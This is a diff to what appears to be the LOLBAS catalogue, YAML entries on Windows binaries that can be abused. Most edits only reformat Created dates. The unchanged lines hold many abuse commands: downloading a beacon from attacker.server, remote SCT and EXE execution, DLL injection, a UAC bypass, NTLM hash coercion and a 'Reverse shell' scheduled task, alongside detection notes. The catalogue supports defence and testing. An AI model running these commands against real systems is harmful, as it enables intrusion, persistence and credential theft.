Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.

View File

@ -2,7 +2,7 @@
Name: Esentutl.exe Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file. Description: Copies the source VBS file to the destination VBS file.

View File

@ -2,7 +2,7 @@
Name: Eventvwr.exe Name: Eventvwr.exe
Description: Displays Windows Event Logs in a GUI window. Description: Displays Windows Event Logs in a GUI window.
Author: 'Jacob Gajek' Author: 'Jacob Gajek'
Created: '2018-11-01' Created: 2018-11-01
Commands: Commands:
- Command: eventvwr.exe - Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe
Code Sample: Code_Sample:
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Detection: Detection:
- IOC: eventvwr.exe launching child process other than mmc.exe - IOC: eventvwr.exe launching child process other than mmc.exe

View File

@ -2,7 +2,7 @@
Name: Expand.exe Name: Expand.exe
Description: Binary that expands one or more compressed files Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
Description: Copies source file to destination. Description: Copies source file to destination.

View File

@ -2,7 +2,7 @@
Name: Explorer.exe Name: Explorer.exe
Description: Binary used for managing files and system components within Windows Description: Binary used for managing files and system components within Windows
Author: 'Jai Minton' Author: 'Jai Minton'
Created: '2020-06-24' Created: 2020-06-24
Commands: Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe" - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe

View File

@ -2,7 +2,7 @@
Name: Extexport.exe Name: Extexport.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Extexport.exe c:\test foo bar - Command: Extexport.exe c:\test foo bar
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll

View File

@ -2,7 +2,7 @@
Name: Extrac32.exe Name: Extrac32.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Findstr.exe Name: Findstr.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

View File

@ -2,7 +2,7 @@
Name: Forfiles.exe Name: Forfiles.exe
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.

View File

@ -2,7 +2,7 @@
Name: Ftp.exe Name: Ftp.exe
Description: A binary designed for connecting to FTP servers Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-12-10' Created: 2018-12-10
Commands: Commands:
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Description: Executes the commands you put inside the text file. Description: Executes the commands you put inside the text file.

View File

@ -2,7 +2,7 @@
Name: GfxDownloadWrapper.exe Name: GfxDownloadWrapper.exe
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez Author: Jesus Galvez
Created: Jesus Galvez Created: 2019-12-27
Commands: Commands:
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".

View File

@ -2,7 +2,7 @@
Name: Gpscript.exe Name: Gpscript.exe
Description: Used by group policy to process scripts Description: Used by group policy to process scripts
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Gpscript /logon - Command: Gpscript /logon
Description: Executes logon scripts configured in Group Policy. Description: Executes logon scripts configured in Group Policy.

View File

@ -2,7 +2,7 @@
Name: Hh.exe Name: Hh.exe
Description: Binary used for processing chm files in Windows Description: Binary used for processing chm files in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: HH.exe http://some.url/script.ps1 - Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help. Description: Open the target PowerShell script with HTML Help.

View File

@ -2,7 +2,7 @@
Name: Ie4uinit.exe Name: Ie4uinit.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: ie4uinit.exe -BaseSettings - Command: ie4uinit.exe -BaseSettings
Description: Executes commands from a specially prepared ie4uinit.inf file. Description: Executes commands from a specially prepared ie4uinit.inf file.

View File

@ -2,7 +2,7 @@
Name: Ieexec.exe Name: Ieexec.exe
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.

View File

@ -2,7 +2,7 @@
Name: Ilasm.exe Name: Ilasm.exe
Description: used for compile c# code into dll or exe. Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux) Author: Hai vaknin (lux)
Created: 17/03/2020 Created: 2020-03-17
Commands: Commands:
- Command: ilasm.exe C:\public\test.txt /exe - Command: ilasm.exe C:\public\test.txt /exe
Description: Binary file used by .NET to compile c# code to .exe Description: Binary file used by .NET to compile c# code to .exe

View File

@ -2,7 +2,7 @@
Name: Infdefaultinstall.exe Name: Infdefaultinstall.exe
Description: Binary used to perform installation based on content inside inf files Description: Binary used to perform installation based on content inside inf files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf - Command: InfDefaultInstall.exe Infdefaultinstall.inf
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.

View File

@ -2,7 +2,7 @@
Name: Installutil.exe Name: Installutil.exe
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.

View File

@ -2,7 +2,7 @@
Name: Jsc.exe Name: Jsc.exe
Description: Binary file used by .NET to compile javascript code to .exe or .dll format Description: Binary file used by .NET to compile javascript code to .exe or .dll format
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2019-05-31' Created: 2019-05-31
Commands: Commands:
- Command: jsc.exe scriptfile.js - Command: jsc.exe scriptfile.js
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.

View File

@ -2,7 +2,7 @@
Name: Makecab.exe Name: Makecab.exe
Description: Binary to package existing files into a cabinet (.cab) file Description: Binary to package existing files into a cabinet (.cab) file
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Mavinject.exe Name: Mavinject.exe
Description: Used by App-v in Windows Description: Used by App-v in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Description: Inject evil.dll into a process with PID 3110. Description: Inject evil.dll into a process with PID 3110.

View File

@ -2,7 +2,7 @@
Name: Microsoft.Workflow.Compiler.exe Name: Microsoft.Workflow.Compiler.exe
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: 'Conor Richard' Author: 'Conor Richard'
Created: '2018-10-22' Created: 2018-10-22
Commands: Commands:
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.

View File

@ -2,7 +2,7 @@
Name: Mmc.exe Name: Mmc.exe
Description: Load snap-ins to locally and remotely manage Windows systems Description: Load snap-ins to locally and remotely manage Windows systems
Author: '@bohops' Author: '@bohops'
Created: '2018-12-04' Created: 2018-12-04
Commands: Commands:
- Command: mmc.exe -Embedding c:\path\to\test.msc - Command: mmc.exe -Embedding c:\path\to\test.msc
Description: Launch a 'backgrounded' MMC process and invoke a COM payload Description: Launch a 'backgrounded' MMC process and invoke a COM payload

View File

@ -2,7 +2,7 @@
Name: MpCmdRun.exe Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '09/03/2020' Created: 2020-03-20
Commands: Commands:
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)

View File

@ -2,7 +2,7 @@
Name: Msbuild.exe Name: Msbuild.exe
Description: Used to compile and execute code Description: Used to compile and execute code
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: msbuild.exe pshell.xml - Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file. Description: Build and execute a C# project stored in the target XML file.
@ -37,7 +37,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Msbuild.exe should not normally be executed on workstations - IOC: Msbuild.exe should not normally be executed on workstations
Resources: Resources:

View File

@ -2,7 +2,7 @@
Name: Msconfig.exe Name: Msconfig.exe
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Msconfig.exe -5 - Command: Msconfig.exe -5
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.

View File

@ -2,7 +2,7 @@
Name: Msdt.exe Name: Msdt.exe
Description: Microsoft diagnostics tool Description: Microsoft diagnostics tool
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.

View File

@ -2,7 +2,7 @@
Name: Mshta.exe Name: Mshta.exe
Description: Used by Windows to execute html applications. (.hta) Description: Used by Windows to execute html applications. (.hta)
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: mshta.exe evilfile.hta - Command: mshta.exe evilfile.hta
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.

View File

@ -2,7 +2,7 @@
Name: Msiexec.exe Name: Msiexec.exe
Description: Used by Windows to execute msi files Description: Used by Windows to execute msi files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: msiexec /quiet /i cmd.msi - Command: msiexec /quiet /i cmd.msi
Description: Installs the target .MSI file silently. Description: Installs the target .MSI file silently.

View File

@ -2,7 +2,7 @@
Name: Netsh.exe Name: Netsh.exe
Description: Netsh is a Windows tool used to manipulate network interface settings. Description: Netsh is a Windows tool used to manipulate network interface settings.
Author: 'Freddie Barr-Smith' Author: 'Freddie Barr-Smith'
Created: '2019-12-24' Created: 2019-12-24
Commands: Commands:
- Command: netsh.exe add helper C:\Users\User\file.dll - Command: netsh.exe add helper C:\Users\User\file.dll
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called

View File

@ -2,7 +2,7 @@
Name: Odbcconf.exe Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: odbcconf -f file.rsp - Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.

View File

@ -2,7 +2,7 @@
Name: Pcalua.exe Name: Pcalua.exe
Description: Program Compatibility Assistant Description: Program Compatibility Assistant
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: pcalua.exe -a calc.exe - Command: pcalua.exe -a calc.exe
Description: Open the target .EXE using the Program Compatibility Assistant. Description: Open the target .EXE using the Program Compatibility Assistant.

View File

@ -2,7 +2,7 @@
Name: Pcwrun.exe Name: Pcwrun.exe
Description: Program Compatibility Wizard Description: Program Compatibility Wizard
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe - Command: Pcwrun.exe c:\temp\beacon.exe
Description: Open the target .EXE file with the Program Compatibility Wizard. Description: Open the target .EXE file with the Program Compatibility Wizard.

View File

@ -2,7 +2,7 @@
Name: Pktmon.exe Name: Pktmon.exe
Description: Capture Network Packets on the windows 10 with October 2018 Update or later. Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: 'Derek Johnson' Author: 'Derek Johnson'
Created: '2020-08-12' Created: 2020-08-12
Commands: Commands:
- Command: pktmon.exe start --etw - Command: pktmon.exe start --etw
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop

View File

@ -2,7 +2,7 @@
Name: Presentationhost.exe Name: Presentationhost.exe
Description: File is used for executing Browser applications Description: File is used for executing Browser applications
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap - Command: Presentationhost.exe C:\temp\Evil.xbap
Description: Executes the target XAML Browser Application (XBAP) file Description: Executes the target XAML Browser Application (XBAP) file

View File

@ -2,7 +2,7 @@
Name: Print.exe Name: Print.exe
Description: Used by Windows to send files to the printer Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.

View File

@ -2,7 +2,7 @@
Name: Psr.exe Name: Psr.exe
Description: Windows Problem Steps Recorder, used to record screen and clicks. Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko Author: Leon Rodenko
Created: '2020-06-27' Created: 2020-06-27
Commands: Commands:
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.

View File

@ -2,7 +2,7 @@
Name: Rasautou.exe Name: Rasautou.exe
Description: Windows Remote Access Dialer Description: Windows Remote Access Dialer
Author: 'Tony Lambert' Author: 'Tony Lambert'
Created: '2020-01-10' Created: 2020-01-10
Commands: Commands:
- Command: rasautou -d powershell.dll -p powershell -a a -e e - Command: rasautou -d powershell.dll -p powershell -a a -e e
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.

View File

@ -2,7 +2,7 @@
Name: Reg.exe Name: Reg.exe
Description: Used to manipulate the registry Description: Used to manipulate the registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.

View File

@ -2,7 +2,7 @@
Name: Regasm.exe Name: Regasm.exe
Description: Part of .NET Description: Part of .NET
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regasm.exe AllTheThingsx64.dll - Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.

View File

@ -2,7 +2,7 @@
Name: Regedit.exe Name: Regedit.exe
Description: Used by Windows to manipulate registry Description: Used by Windows to manipulate registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file. Description: Export the target Registry key to the specified .REG file.

View File

@ -2,7 +2,7 @@
Name: Regini.exe Name: Regini.exe
Description: Used to manipulate the registry Description: Used to manipulate the registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2020-07-03' Created: 2020-07-03
Commands: Commands:
- Command: regini.exe newfile.txt:hidden.ini - Command: regini.exe newfile.txt:hidden.ini
Description: Write registry keys from data inside the Alternate data stream. Description: Write registry keys from data inside the Alternate data stream.

View File

@ -2,7 +2,7 @@
Name: Register-cimprovider.exe Name: Register-cimprovider.exe
Description: Used to register new wmi providers Description: Used to register new wmi providers
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll" - Command: Register-cimprovider -path "C:\folder\evil.dll"
Description: Load the target .DLL. Description: Load the target .DLL.

View File

@ -2,7 +2,7 @@
Name: Regsvcs.exe Name: Regsvcs.exe
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.

View File

@ -2,7 +2,7 @@
Name: Regsvr32.exe Name: Regsvr32.exe
Description: Used by Windows to register dlls Description: Used by Windows to register dlls
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll. Description: Execute the specified remote .SCT script with scrobj.dll.

View File

@ -2,7 +2,7 @@
Name: Replace.exe Name: Replace.exe
Description: Used to replace file with another file Description: Used to replace file with another file
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A - Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy file.cab to destination Description: Copy file.cab to destination

View File

@ -2,7 +2,7 @@
Name: Rpcping.exe Name: Rpcping.exe
Description: Used to verify rpc connection Description: Used to verify rpc connection
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

View File

@ -2,7 +2,7 @@
Name: Rundll32.exe Name: Rundll32.exe
Description: Used by Windows to execute dll files Description: Used by Windows to execute dll files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint - Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.

View File

@ -2,7 +2,7 @@
Name: Runonce.exe Name: Runonce.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Runonce.exe /AlternateShellStartup - Command: Runonce.exe /AlternateShellStartup
Description: Executes a Run Once Task that has been configured in the registry Description: Executes a Run Once Task that has been configured in the registry

View File

@ -2,7 +2,7 @@
Name: Runscripthelper.exe Name: Runscripthelper.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Description: Execute the PowerShell script named test.txt Description: Execute the PowerShell script named test.txt

View File

@ -2,7 +2,7 @@
Name: Sc.exe Name: Sc.exe
Description: Used by Windows to manage services Description: Used by Windows to manage services
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS. Description: Creates a new service and executes the file stored in the ADS.

View File

@ -2,7 +2,7 @@
Name: Schtasks.exe Name: Schtasks.exe
Description: Schedule periodic tasks Description: Schedule periodic tasks
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
Description: Create a recurring task to execute every minute. Description: Create a recurring task to execute every minute.

View File

@ -2,7 +2,7 @@
Name: Scriptrunner.exe Name: Scriptrunner.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Scriptrunner.exe -appvscript calc.exe - Command: Scriptrunner.exe -appvscript calc.exe
Description: Executes calc.exe Description: Executes calc.exe

View File

@ -2,7 +2,7 @@
Name: SyncAppvPublishingServer.exe Name: SyncAppvPublishingServer.exe
Description: Used by App-v to get App-v server lists Description: Used by App-v to get App-v server lists
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
